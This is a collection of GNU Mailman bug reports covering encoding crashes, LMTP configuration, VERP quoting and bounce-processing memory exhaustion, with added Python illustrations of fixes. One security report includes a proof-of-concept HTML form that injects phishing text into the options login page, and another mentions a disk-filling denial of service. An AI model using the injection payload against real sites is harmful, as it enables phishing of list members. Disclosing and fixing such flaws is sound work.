Public bug reported:
When a message contains an invalid unicode sequence in its header,
qrunner flat out crashes on that:
May 17 15:32:20 2015 (981) Uncaught runner exception: 'utf8' codec can't decode byte
0xe9 in position 18: invalid continuation byte
May 17 15:32:20 2015 (981) Traceback (most recent call last):
File "/var/lib/mailman/Mailman/Queue/Runner.py", line 119, in _oneloop
self._onefile(msg, msgdata)
File "/var/lib/mailman/Mailman/Queue/Runner.py", line 190, in _onefile
keepqueued = self._dispose(mlist, msg, msgdata)
File "/var/lib/mailman/Mailman/Queue/IncomingRunner.py", line 130, in _dispose
more = self._dopipeline(mlist, msg, msgdata, pipeline)
File "/var/lib/mailman/Mailman/Queue/IncomingRunner.py", line 153, in _dopipeline
sys.modules[modname].process(mlist, msg, msgdata)
File "/var/lib/mailman/Mailman/Handlers/CookHeaders.py", line 239, in process
i18ndesc = uheader(mlist, mlist.description, 'List-Id', maxlinelen=998)
File "/var/lib/mailman/Mailman/Handlers/CookHeaders.py", line 65, in uheader
return Header(s, charset, maxlinelen, header_name, continuation_ws)
File "/usr/lib/python2.7/email/header.py", line 183, in __init__
self.append(s, charset, errors)
File "/usr/lib/python2.7/email/header.py", line 267, in append
ustr = unicode(s, incodec, errors)
UnicodeDecodeError: 'utf8' codec can't decode byte 0xe9 in position 18: invalid
continuation byte
May 17 15:32:20 2015 (981) SHUNTING:
1431869540.389822+156779307d54473d0eb732994bb67eee95733285
A solution for this specific case is to have Mailman/Handlers/CookHeaders.py pass the errors='replace' parameter.
I would say that this is actually a bug in python-email, since I think it doesn't make sense to set errors to "strict" rather than something like "replace" when the intention is to parse stuff so free-formed, under-specified
and user-controlled as email. Nonetheless, Mailman already sets errors='replace' in some places so it might as well add it here.
** Affects: mailman
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1462755
Title:
qrunner crashes on invalid unicode sequence
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1462755/+subscriptions
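The failure in the traceback and the errors='replace' change proposed above, as an added example (Python 3; not Mailman's or python-email's own code): the helper names and the two sample byte strings are this example's own, and header_with_fallback is an alternative this example adds, falling back to ISO-8859-1 instead of replacing bytes, which the report does not propose. Python 3's email.header.Header takes the same errors argument as the Python 2.7 one in the traceback and decodes byte input the same way.

```python
from email.header import Header

# Constructed sample inputs (not from the report): a list description saved
# as Latin-1, so the e-acute is a lone 0xE9 byte, which is not a valid UTF-8
# sequence, next to the same text correctly encoded as UTF-8.
LATIN1_DESCRIPTION = b"Caf\xe9 users"
UTF8_DESCRIPTION = "Caf\u00e9 users".encode("utf-8")


def strict_header(value, charset="utf-8", header_name="List-Id"):
    """The failing pattern from the traceback: Header() defaults to
    errors='strict', so a byte string that is not valid in `charset`
    raises UnicodeDecodeError instead of producing a header."""
    return Header(value, charset, maxlinelen=998, header_name=header_name)


def lenient_header(value, charset="utf-8", header_name="List-Id"):
    """The change the report proposes: errors='replace' substitutes U+FFFD
    for each undecodable byte, so the handler keeps going."""
    return Header(value, charset, maxlinelen=998, header_name=header_name,
                  errors="replace")


def header_with_fallback(value, charset="utf-8", header_name="List-Id"):
    """Alternative chosen for this example (not the report's proposal): try
    the declared charset, and if that fails reinterpret the bytes as
    ISO-8859-1, which maps every byte to a code point, so the original
    text survives instead of being replaced."""
    try:
        text = value.decode(charset)
    except UnicodeDecodeError:
        text = value.decode("iso-8859-1")
        charset = "iso-8859-1"
    return Header(text, charset, maxlinelen=998, header_name=header_name)


def raises_decode_error(builder, value):
    """True if building the header with `builder` raises UnicodeDecodeError."""
    try:
        builder(value)
    except UnicodeDecodeError:
        return True
    return False


def describe(header):
    """(decoded text, RFC 2047 wire form) for a Header object."""
    return str(header), header.encode()


if __name__ == "__main__":
    print("strict raises:", raises_decode_error(strict_header, LATIN1_DESCRIPTION))
    print("replace      :", describe(lenient_header(LATIN1_DESCRIPTION)))
    print("fallback     :", describe(header_with_fallback(LATIN1_DESCRIPTION)))
    print("valid utf-8  :", describe(strict_header(UTF8_DESCRIPTION)))
```

Note that in the traceback the value handed to uheader() is mlist.description, a stored list attribute, rather than a header of the incoming message, so the bad bytes need not arrive with each message; either way, building the header with errors='replace' (or a fallback charset) keeps the runner processing instead of shunting every message that hits the value.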
Public bug reported:
We need a script, documentation, or other procedure to help people
migrate from Mailman 2 to Mailman 3.
** Affects: mailman
Importance: Undecided
Status: New
** Tags: mailman3
--
https://bugs.launchpad.net/bugs/965532
Title:
Need a script to upgrade from MM2 to MM3
Public bug reported:
Mailman 3 is essentially five projects:
Mailman Core
Postorius - The Web UI for Mailman
Mailman Client - The REST API Client
HyperKitty - The Archiver for Mailman
Mailman Bundler - Installer for Mailman Suite including all above projects
URL: https://www.gnu.org/software/mailman/
** Affects: mailman
Importance: Undecided
Status: New
** Affects: ubuntu
Importance: Undecided
Status: New
** Affects: debian
Importance: Unknown
Status: Unknown
** Tags: needs-packaging
** Bug watch added: Debian Bug tracker #799292
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=799292
** Also affects: debian via
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=799292
Importance: Unknown
Status: Unknown
** Also affects: mailman
Importance: Undecided
Status: New
--
https://bugs.launchpad.net/bugs/1609516
Title:
[needs-packaging] GNU Mailman v3
Public bug reported:
Setting localhost in postfix_lmtp works against Postfix defaults and
breaks delivery.
Reason: The Postfix lmtp client only uses DNS queries by default to
search for hostnames. If the DNS server does not provide an answer for
"localhost", delivery from the lmtp client to mailman fails.
Solution: Provide "127.0.0.1" instead of "localhost". This does not
require DNS and is even faster because it saves DNS lookups.
Example:
hey2@mailman.state-of-mind.de
lmtp:[localhost.localdomain]:8024
** Affects: mailman
Importance: Undecided
Status: New
** Tags: 3.0 mailman
--
https://bugs.launchpad.net/bugs/544477
Title:
setting localhost in postfix_lmtp breaks delivery
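A check for the configuration problem described above, as an added example that is not Mailman's or Postfix's code: it lints transport-map lines of the form the report shows for destinations that only work if DNS answers, and rewrites loopback names to the address literal. The sample map lines are constructed and the function names are this example's own; the Postfix facts it relies on are that brackets suppress MX lookups and that the bracketed hostname is still resolved through lmtp_host_lookup, whose default is dns.

```python
import ipaddress
import re

# Constructed postfix_lmtp map lines in the layout the report shows
# ("<address> lmtp:[<host>]:<port>"); the first two depend on DNS.
SAMPLE_MAP = """\
hey2@mailman.state-of-mind.de          lmtp:[localhost.localdomain]:8024
hey2-bounces@mailman.state-of-mind.de  lmtp:[localhost]:8024
hey2-request@mailman.state-of-mind.de  lmtp:[127.0.0.1]:8024
hey2-owner@mailman.state-of-mind.de    lmtp:[::1]:8024
"""

# Only the bracketed form is handled: brackets suppress MX lookups, but a
# bracketed hostname is still resolved via lmtp_host_lookup (default: dns).
ENTRY_RE = re.compile(r"^(?P<key>\S+)\s+lmtp:\[(?P<host>[^\]]+)\](?::(?P<port>\d+))?\s*$")
LOCAL_NAMES = ("localhost", "localhost.localdomain")


def is_address_literal(host):
    """True for an IPv4/IPv6 literal, which Postfix connects to without DNS."""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def lint_transport_map(text):
    """Return (line_no, host, reason) for every entry that only delivers if
    DNS answers; address literals pass, unparsable lines are reported too."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = ENTRY_RE.match(line)
        if m is None:
            findings.append((n, None, "not in the expected '<key> lmtp:[host]:port' form"))
            continue
        host = m.group("host")
        if not is_address_literal(host):
            findings.append((n, host, "hostname needs an A/AAAA answer (lmtp_host_lookup defaults to dns)"))
    return findings


def rewrite_loopback_names(text, literal="127.0.0.1"):
    """Replace loopback *names* with the loopback address literal. Other
    hostnames are left alone: they may be real remote LMTP servers."""
    pattern = re.compile(r"^(?P<key>\S+)(?P<sep>\s+)lmtp:\[(?P<host>[^\]]+)\](?P<port>:\d+)?", re.M)

    def repl(m):
        host = m.group("host").lower()
        if host in LOCAL_NAMES or host.endswith(".localhost"):
            return m.group("key") + m.group("sep") + "lmtp:[" + literal + "]" + (m.group("port") or "")
        return m.group(0)

    return pattern.sub(repl, text)


if __name__ == "__main__":
    for line_no, host, reason in lint_transport_map(SAMPLE_MAP):
        print("line %d: %s: %s" % (line_no, host, reason))
    print(rewrite_loopback_names(SAMPLE_MAP))
```

In Mailman 3 the map is generated from the lmtp_host setting in the [mta] section of mailman.cfg, so changing that setting (to 127.0.0.1) and regenerating is the durable fix; the rewrite above only shows what the corrected lines look like.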
*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE-2018-13796 (https://www.cvedetails.com/cve/CVE-2018-13796/)
exists at a different endpoint and parameter. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/mailman/options/mailman" method="POST">
<input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" />
<input type="hidden" name="UserOptions" value="Unsubscribe or edit options" />
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. It can be seen there: the message "Your account has been hacked. Kindly go to
https://badsite.com or share your credentials at attacker@badsite.com"
will be displayed on the screen.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: Confirmed
--
https://bugs.launchpad.net/bugs/1873722
Title:
Arbitrary Content Injection via the options login page.
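One way to close the injection described above, as an added example that is not Mailman's code: a vulnerable renderer that echoes the POSTed email parameter next to a hardened one that echoes it only after a syntactic address check. The function names, the messages and the (deliberately narrow) address regex are this example's own; the sample input is the text from the proof of concept.

```python
import html
import re

# The POSTed value from the report's proof of concept, used as sample input.
INJECTED = ("Your account has been hacked. Kindly go to https://badsite.com "
            "or share your credentials at attacker@badsite.com")

# Deliberately narrow addr-spec check (an assumption of this example, not a
# full RFC 5322 parser): dot-atom local part, dotted domain, no whitespace.
ADDR_RE = re.compile(
    r"^[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
    r"@(?:[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?\.)+[A-Za-z]{2,}$")
MAX_ADDR_LEN = 254


def render_vulnerable(form):
    """Echoes the 'email' parameter back in a status message. HTML escaping
    stops script injection but not this attack: the payload is plain text
    and reads as a message from the site itself."""
    return "<p>No such member: %s</p>" % html.escape(form.get("email", ""))


def render_hardened(form):
    """Reflect the value only after it passes a syntactic address check (and
    still escape it); otherwise answer with a fixed message that repeats
    nothing from the request, so there is nothing for an attacker to say."""
    candidate = form.get("email", "").strip()
    if len(candidate) > MAX_ADDR_LEN or not ADDR_RE.match(candidate):
        return "<p>The address you entered is not a valid email address.</p>"
    return "<p>No such member: %s</p>" % html.escape(candidate)


def reflects_attacker_text(rendered):
    """Does the response carry the phishing text from the proof of concept?"""
    return "badsite.com" in rendered or "hacked" in rendered


if __name__ == "__main__":
    print(render_vulnerable({"email": INJECTED}))
    print(render_hardened({"email": INJECTED}))
    print(render_hardened({"email": "bob@example.com"}))
```

The check is about what gets reflected, not about script execution: the proof of concept carries no markup, so output encoding alone would not have helped. Rejecting anything that does not look like an address, and using a fixed error message for the rest, leaves the attacker no channel through which their own wording reaches the victim.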
Public bug reported:
From the "Welcome email txt file" in the option "Edit the public HTML
pages and text files",
this code parses incorrectly:
Welcome to the %(description)s mailing list!
%(welcome)s
It produces:
Welcome to the %(description)s mailing list!
Here is where the welcome variable got substituted but the description variable did not. Have fun.
The description variable is not being substituted in the email body.
** Affects: mailman
Importance: Undecided
Status: New
** Tags: description variable
--
https://bugs.launchpad.net/bugs/1872840
Title:
(description)s variable not substituted in emails
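One interpolation mechanism that yields exactly the output shown above, as an added example that is not Mailman's code: a lenient %-style expansion that leaves unknown placeholders in place, plus a strict mode that names them so an edited template can be checked when it is saved. It does not establish why description is missing from the substitution the report describes; the template and the welcome text are taken from the report, the value dict and everything else are this example's own.

```python
import re

PLACEHOLDER = re.compile(r"%\((?P<key>[^)]+)\)s")

# Constructed from the report: its template, and a value dict that supplies
# 'welcome' but not 'description' (the situation its output implies).
TEMPLATE = "Welcome to the %(description)s mailing list!\n%(welcome)s\n"
VALUES = {"welcome": "Here is where the welcome variable got substituted "
                     "but the description variable did not. Have fun."}


class LeaveUnknown(dict):
    """Mapping whose missing keys expand to their own placeholder text, so
    '%(x)s' % LeaveUnknown({}) yields '%(x)s' instead of raising KeyError."""
    def __missing__(self, key):
        return "%(" + key + ")s"


def unknown_keys(template, values):
    """Placeholder names the template uses that `values` does not supply."""
    used = {m.group("key") for m in PLACEHOLDER.finditer(template)}
    return sorted(used - set(values))


def interpolate(template, values, strict=False):
    """Expand %(key)s placeholders. Lenient mode reproduces the report's
    output; strict mode raises, naming the unknown keys, which is what a
    save-time check on an edited template would want."""
    if strict:
        missing = unknown_keys(template, values)
        if missing:
            raise KeyError("unknown template variables: " + ", ".join(missing))
    return template % LeaveUnknown(values)


if __name__ == "__main__":
    print(interpolate(TEMPLATE, VALUES))
    print("unknown:", unknown_keys(TEMPLATE, VALUES))
```

A lenient mapping is the right default at send time (a typo in a template should not stop mail going out), but the strict check belongs in the admin form that accepts the edited template, where the unknown name can be reported to the person who typed it.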
Public bug reported:
We have seen (very rarely) cases where a recipient address has a quoted
local part such as "jr."@example.org. This results in a VERPed sender
address like list-bounces+"jr."=example.org@example.com which is
syntactically invalid. The VERPed sender should be
"list-bounces+jr.=example.org"@example.com in this case. I.e., the entire
VERPed sender local part should be quoted, not just the recipient local
part.
This also requires BounceRunner to recognize this and restore the
original local part.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: In Progress
--
https://bugs.launchpad.net/bugs/1731604
Title:
VERP fails if the recipient address local part is quoted.
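The two VERP constructions described above, as an added example that is not Mailman's code: the naive one that produces the syntactically invalid sender, the one the report asks for (the whole VERP local part quoted), and the inverse mapping a bounce processor needs. The address grammar is the dot-atom/quoted-string distinction from RFC 5322, the VERP layout bounces+mailbox=host follows the report, and the function names, the sample addresses and the choice to split the recipient domain at the last '=' are this example's own.

```python
import re

# RFC 5322 dot-atom: atext runs joined by single dots (no leading, trailing
# or doubled dot). A local part that is not a dot-atom must be a quoted-string.
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
DOT_ATOM = re.compile(r"^" + ATEXT + r"(?:\." + ATEXT + r")*$")


def split_addr(addr):
    """Split an addr-spec into (local_part, domain, was_quoted), removing the
    quotes and backslash escapes of a quoted local part."""
    if addr.startswith('"'):
        i, out = 1, []
        while i < len(addr):
            c = addr[i]
            if c == "\\" and i + 1 < len(addr):
                out.append(addr[i + 1])
                i += 2
                continue
            if c == '"':
                break
            out.append(c)
            i += 1
        else:
            raise ValueError("unterminated quoted local part: %r" % addr)
        if addr[i + 1:i + 2] != "@" or not addr[i + 2:]:
            raise ValueError("malformed addr-spec: %r" % addr)
        return "".join(out), addr[i + 2:], True
    local, sep, domain = addr.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError("malformed addr-spec: %r" % addr)
    return local, domain, False


def join_addr(local, domain, force_quote=False):
    """Build an addr-spec, quoting the *whole* local part when it is not a
    dot-atom (or when the caller asks for it)."""
    if DOT_ATOM.match(local) and not force_quote:
        return local + "@" + domain
    escaped = local.replace("\\", "\\\\").replace('"', '\\"')
    return '"' + escaped + '"@' + domain


def is_valid_addr_spec(addr):
    """Syntactic check: a quoted local part, or an unquoted dot-atom."""
    try:
        local, domain, quoted = split_addr(addr)
    except ValueError:
        return False
    return bool(quoted or DOT_ATOM.match(local))


def verp_sender_naive(bounces_addr, recipient):
    """The construction the report describes as broken: the recipient's
    local part is spliced in with its quotes, leaving bare '"' characters
    inside an unquoted local part."""
    blocal, bdomain, _ = split_addr(bounces_addr)
    rlocal, rdomain = recipient.rsplit("@", 1)   # keeps the quotes
    return "%s+%s=%s@%s" % (blocal, rlocal, rdomain, bdomain)


def verp_sender(bounces_addr, recipient):
    """The construction the report asks for: assemble the unquoted VERP
    local part, then quote it as a whole if the recipient's local part was
    quoted or the result is not a dot-atom."""
    blocal, bdomain, _ = split_addr(bounces_addr)
    rlocal, rdomain, rquoted = split_addr(recipient)
    return join_addr("%s+%s=%s" % (blocal, rlocal, rdomain), bdomain,
                     force_quote=rquoted)


def verp_decode(sender):
    """What the bounce processor must do with the sender of a returned
    message: recover (bounces_addr, original_recipient). The recipient
    domain is taken after the last '=' so '=' may appear in the recipient
    local part but not in its domain (an assumption of this example)."""
    local, domain, _ = split_addr(sender)
    blocal, plus, rest = local.partition("+")
    rlocal, eq, rdomain = rest.rpartition("=")
    if not plus or not eq or not rlocal or not rdomain:
        raise ValueError("not a VERP sender: %r" % sender)
    return join_addr(blocal, domain), join_addr(rlocal, rdomain)


if __name__ == "__main__":
    bad = verp_sender_naive("list-bounces@example.com", '"jr."@example.org')
    good = verp_sender("list-bounces@example.com", '"jr."@example.org')
    print(bad, is_valid_addr_spec(bad))
    print(good, is_valid_addr_spec(good), verp_decode(good))
```

The decode step is where the report's second requirement lives: once the whole local part is quoted, the bounce processor has to unquote it before it can find the '+' and '=' separators, and it has to re-quote the recovered recipient local part (here "jr." with its trailing dot) so that the address it hands to the bounce logic matches the member record.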
Public bug reported:
System: RHEL 7.7
Mailman: mailman-2.1.15-26.el7_4.1.x86_64
Description: We have 2 mailing lists with > 7000 members which trigger a spike in processed bounces (more than 3000 in a single run), followed by an out-of-memory situation in the BounceRunner and a > 20 GB bounce-event-XXXX.pck
file.
We tried to mitigate the problem by increasing the system memory, running the BounceRunner
every minute and limiting the number of mails delivered at once by Postfix.
But it happened again:
Dec 30 19:53:29 2019 (13392) <BounceRunner at 140395473885088>
processing 4134 queued bounces
...
Dec 30 19:53:59 mx09 kernel: [13392] 41 13392 2755797 1874474 5337 825695 0 python
...
Dec 30 19:53:59 mx09 kernel: Out of memory: Kill process 13392 (python) score 896 or sacrifice child
Dec 30 19:53:59 mx09 kernel: Killed process 13392 (python), UID 41, total-vm:11023188kB, anon-rss:7497896kB, file-rss:0kB, shmem-rss:0kB
We analyzed the bounce-event file, extracting data with "strings".
This time we extracted the Postfix mail queue IDs from the Received headers
of our list server. We found the following:
cat /tmp/bounce-20191230.txt | sed 's/;//' | sort | uniq -c | sort -n
1 01A7DE9314
1 10F6AE9319
1 18456E930E
1 27D0BAC960
1 3B51CE9316
1 57C2DAC992
1 5D3B2E9310
1 5EF11E9311
1 63054E9312
1 69377E9313
1 ED636E930F
2 29884E9315
2 49ECEAC98D
2 99A16A9DA7
2 (Postfix)
3 59EE1AC995
3 CEB61AC996
192 C12E9D3B48
3929 F2BEEE9318
4122 CC58AAC993
4134 6EFD1A9DA7
Of the bounces, the last 2 qids are from the original mail sent to the list (6EFD1A9DA7),
and one of the mails sent by Mailman to 500 members of that list (CC58AAC993).
(F2BEEE9318 and C12E9D3B48) are both bounces from members that were delivered only once
to /usr/lib/mailman/mail/mailman bounces NAME-OF-HUGE-LIST
So to me it seems that somehow a few bounces were "multiplied" so that ~20 real
bounces produced 4134 virtual bounces.
I see the potential of a denial of service attack, as it could be used
to fill up the disk where the bounce-event files get dumped
But I don't know if this would warrant marking "This bug is a security vulnerability".
** Affects: mailman
Importance: Undecided
Status: New
--
https://bugs.launchpad.net/bugs/1859011
Title:
bounce mail processed multiple times -> oom crash of BounceRunner
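A pre-processing check for the pattern described above, as an added example that is not Mailman's code: it counts Postfix queue ids from the Received headers of a batch of bounces the way the report's shell pipeline does, flags ids that occur more often than there are distinct failed recipients, and de-duplicates the batch on (recipient, original post) before anything is loaded into a bounce run. The bounce messages are constructed, with the failed address in a plain header rather than in a real DSN's message/delivery-status part, the queue ids reuse the ones listed above, and the function names are this example's own. It detects the multiplication; it does not explain its cause.

```python
import email
import re
from collections import Counter
from email import policy

# Postfix stamps "... (Postfix) with ESMTP id <queue id>" into Received headers.
QUEUE_ID_RE = re.compile(r"\(Postfix\) with E?SMTP id (?P<qid>[0-9A-F]{6,})\b")


def bounce_message(recipient, qids):
    """Construct one bounce as raw RFC 5322 text with one Received line per
    queue id, newest first, so the original list post's id comes last. A
    real DSN carries the failed address in its message/delivery-status
    part; this constructed sample uses a simple header instead."""
    received = "".join(
        "Received: from relay.example.org by mx09.example.net (Postfix) "
        "with ESMTP id %s\n\tfor <list-bounces@example.net>; "
        "Mon, 30 Dec 2019 19:53:29 +0100\n" % q for q in qids)
    return (received
            + "From: MAILER-DAEMON@example.org\n"
            + "To: list-bounces@example.net\n"
            + "Subject: Undelivered Mail Returned to Sender\n"
            + "X-Failed-Recipient: %s\n\n" % recipient
            + "The following address failed: %s\n" % recipient)


# Constructed batch: three members bounced one list post (queued as
# 6EFD1A9DA7), but carol's bounce arrived fifty times.
SAMPLE_BATCH = (
    [bounce_message("alice@example.org", ["01A7DE9314", "6EFD1A9DA7"]),
     bounce_message("bob@example.org", ["10F6AE9319", "6EFD1A9DA7"])]
    + [bounce_message("carol@example.org",
                      ["F2BEEE9318", "CC58AAC993", "6EFD1A9DA7"])] * 50)


def queue_ids(raw):
    """Queue ids from every Received header, in header order."""
    msg = email.message_from_string(raw, policy=policy.default)
    found = []
    for value in msg.get_all("Received", []):
        m = QUEUE_ID_RE.search(str(value))
        if m:
            found.append(m.group("qid"))
    return found


def bounce_key(raw):
    """(failed recipient, queue id of the original post): the identity of a
    bounce for de-duplication purposes."""
    msg = email.message_from_string(raw, policy=policy.default)
    recipient = str(msg.get("X-Failed-Recipient", "")).strip().lower()
    ids = queue_ids(raw)
    return recipient, (ids[-1] if ids else None)


def count_queue_ids(batch):
    """The same aggregation as the report's sort | uniq -c | sort -n."""
    counts = Counter()
    for raw in batch:
        counts.update(queue_ids(raw))
    return counts


def suspicious_queue_ids(batch):
    """Queue ids seen in more bounces than there are distinct failed
    recipients. One post yields at most one bounce per recipient, so any
    excess is copies of the same bounce, not more members bouncing."""
    distinct = len({bounce_key(raw)[0] for raw in batch})
    return sorted(q for q, n in count_queue_ids(batch).items() if n > distinct)


def dedupe_bounces(batch):
    """Keep the first copy of each (recipient, original post) pair. Memory
    then scales with the number of real bouncing members, not with the
    number of copies that arrived."""
    seen, unique, dropped = set(), [], 0
    for raw in batch:
        key = bounce_key(raw)
        if key in seen:
            dropped += 1
            continue
        seen.add(key)
        unique.append(raw)
    return unique, dropped


if __name__ == "__main__":
    for qid, n in sorted(count_queue_ids(SAMPLE_BATCH).items(), key=lambda kv: kv[1]):
        print("%7d %s" % (n, qid))
    print("suspicious:", suspicious_queue_ids(SAMPLE_BATCH))
    print("kept %d, dropped %d" % tuple(map(len if False else (lambda x: x), ())) if False else
          "kept %d, dropped %d" % (len(dedupe_bounces(SAMPLE_BATCH)[0]), dedupe_bounces(SAMPLE_BATCH)[1]))
```

Run against a real batch this would be done one message at a time as bounces are read, so that the duplicate copies never accumulate in the pickle whose size the report mentions; the detection threshold (more occurrences than distinct recipients) is what gives an operator a number to alert on before the runner is the one that finds out.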